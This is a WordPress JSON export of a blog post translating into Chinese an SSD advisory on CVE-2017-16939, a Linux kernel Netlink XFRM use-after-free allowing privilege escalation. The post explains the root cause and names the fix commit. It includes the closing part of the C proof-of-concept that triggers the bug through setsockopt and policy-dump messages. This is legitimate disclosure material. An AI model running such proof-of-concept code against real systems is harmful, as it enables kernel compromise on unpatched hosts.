class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">create_nl_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">do_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f045be6354547480509-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f045be6354547480509-96\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0066 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3563\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 11 Dec 2017 08:51:42 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Linux\u5185\u6838\u4e2d\u53d1\u73b0\u7684\u4e00\u4e2aUAF\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u63d0\u5347\u6743\u9650\u3002\u6f0f\u6d1e\u5b58\u5728\u4e8eNetlink \u5957\u63a5\u5b57\u5b50\u7cfb\u7edf \u2013 XFRM. Netlink\u7528\u4e8e\u5728\u5185\u6838\u548c\u7528\u6237\u7a7a\u95f4\u8fdb\u7a0b\u4e4b\u95f4\u4f20\u8f93\u4fe1\u606f\u3002 \u5b83\u7531\u7528\u6237\u7a7a\u95f4\u8fdb\u7a0b\u7684\u6807\u51c6\u57fa\u4e8e\u5957\u63a5\u5b57\u7684\u63a5\u53e3\u548c\u5185\u6838\u6a21\u5757\u7684\u5185\u90e8\u5185\u6838API\u7ec4\u6210\u3002 \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u4f4d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u5458Mohamed Ghannam\u5411Beyond Security\u7684SSD\u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e \u5382\u5546\u54cd\u5e94 \u8be5\u6f0f\u6d1e\u5df2\u5728\u8865\u4e011137b5e\u4e2d\u88ab\u4fee\u590d\uff08\u201cipsec\uff1a\u4fee\u590d\u4e2d\u6b62xfrm\u7b56\u7565\u8f6c\u50a8\u5d29\u6e83\u201d\uff09 CVE: CVE-2017-16939 [crayon-5a2f0459e8bcf346519844\/] \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u975e\u7279\u6743\u7528\u6237\u53ef\u4ee5\u66f4\u6539Netlink \u5957\u63a5\u5b57\u5b50\u7cfb\u7edf XFRM sk-> sk_rcvbuf\u7684\u503c\uff08sk ==sock\u7ed3\u6784\u4f53\u5bf9\u8c61\uff09\u3002 \u53ef\u4ee5\u901a\u8fc7setsockopt\uff08SO_RCVBUF\uff09\u66f4\u6539sk-> sk_rcvbuf\u7684\u503c\u4e3a\u7279\u5b9a\u7684\u8303\u56f4\u3002\u901a\u8fc7recvmsg\/recv\/read\u63a5\u6536\u6570\u636e\u65f6\uff0csk_rcvbuf\u8868\u793a\u63a5\u6536\u7f13\u51b2\u533a\u7684\u5927\u5c0f\u3002 sk_rcvbuf\u503c\u662f\u5185\u6838\u4e3askb\uff08sk_buff\u7ed3\u6784\u4f53\u5bf9\u8c61\uff09\u5206\u914d\u7684\u5927\u5c0f\u3002 skb-> trusize\u662f\u4e00\u4e2a\u53d8\u91cf\uff0c\u5b83\u4fdd\u6301\u5bf9\u5df2\u4f7f\u7528\u5185\u5b58\u7684\u8ffd\u8e2a\uff0c\u4e3a\u4e86\u907f\u514d\u5185\u5b58\u6d6a\u8d39\uff0c\u65b9\u4fbf\u7ba1\u7406\uff0c\u5185\u6838\u53ef\u4ee5\u5728\u8fd0\u884c\u65f6\u6539\u53d8skb\u7684\u5927\u5c0f\u3002 \u4f8b\u5982\uff0c\u5982\u679c\u6211\u4eec\u5206\u914d\u4e00\u4e2a\u5927\u7684\u5957\u63a5\u5b57\u7f13\u51b2\u533a\uff08skb\uff09\uff0c\u800c\u6211\u4eec\u53ea\u63a5\u6536\u52301\u5b57\u8282\u5927\u5c0f\u7684\u6570\u636e\u5305\uff0c\u5185\u6838\u5c06\u901a\u8fc7\u8c03\u7528skb_set_owner_r\u6765\u8c03\u6574skb-> trusize\u7684\u5927\u5c0f\u3002 \u901a\u8fc7\u8c03\u7528skb_set_owner_r\u4fee\u6539sk-> sk_rmem_alloc\uff08\u5f15\u7528\u81ea\u539f\u5b50\u53d8\u91cfsk-> sk_backlog.rmem_alloc\uff09\u3002 \u5f53\u521b\u5efaXFRM netlink \u5957\u63a5\u5b57\u65f6\uff0c\u4f1a\u8c03\u7528xfrm_dump_policy\u51fd\u6570\uff0c\u5f53\u6211\u4eec\u5173\u95ed\u5957\u63a5\u5b57\u65f6\uff0cxfrm_dump_policy_done\u4f1a\u88ab\u8c03\u7528\u3002 \u5f53netlink_sock\u5bf9\u8c61\u7684cb_running\u503c\u4e3atrue\u65f6\u8c03\u7528xfrm_dump_policy_done\u3002 xfrm_dump_policy_done\u4f1a\u5c1d\u8bd5\u6e05\u7406\u7531netlink_callback\u5bf9\u8c61\u7ba1\u7406\u7684xfrm walk\u6761\u76ee\u3002 \u5f53\u8c03\u7528netlink_skb_set_owner_r\uff08\u5982skb_set_owner_r\uff09\u65f6\uff0c\u5b83\u4f1a\u66f4\u65b0sk_rmem_alloc\u3002 netlink_dump(): \u5728\u4e0a\u9762\u7684\u4ee3\u7801\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5f53sk-> sk_rcvbuf\u5c0f\u4e8esk_rmem_alloc\uff08\u6ce8\u610f\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7stockpot\u63a7\u5236sk-> sk_rcvbuf\uff09\u65f6\uff0cnetlink_dump()\u9a8c\u8bc1\u5931\u8d25\u3002 \u5f53\u6ee1\u8db3sk-> sk_rcvbuf\u5c0f\u4e8esk_rmem_alloc\u65f6\uff0c\u4f1a\u8df3\u8f6c\u5230\u51fd\u6570\u7684\u7ed3\u5c3e\uff0c\u7136\u800ccb_running\u7684\u503c\u8fd8\u6ca1\u6709\u88ab\u66f4\u6539\u4e3afalse\uff0cnetlink_dump()\u51fd\u6570\u5c31\u8fd4\u56de\u4e86\u3002 \u6b64\u65f6nlk-> cb_running\u4e3atrue\uff0c\u56e0\u6b64\u4f1a\u8c03\u7528xfrm_dump_policy_done()\u3002 nlk-> cb.done\u6307\u5411xfrm_dump_policy_done\uff0c\u503c\u5f97\u6ce8\u610f\u7684\u662f\u8fd9\u4e2a\u51fd\u6570\u5904\u7406\u4e00\u4e2a\u53cc\u5411\u94fe\u8868\uff0c\u6240\u4ee5\u5982\u679c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5f15\u7528\u4e00\u4e2a\u53ef\u63a7\u7684\u7f13\u51b2\u533a\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5b9e\u73b0\u4efb\u610f\u5185\u5b58\u8bfb\u5199\u3002 \u6f0f\u6d1e\u8bc1\u660e \u4e0b\u9762\u7684\u4ee3\u7801\u5728Ubuntu 17.04\u6d4b\u8bd5\u3002 [crayon-5a2f0459e8bd9379864677\/]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11946,10757,13145],"class_list":["post-10805","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10805","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10805"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10805\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10805"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10805"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}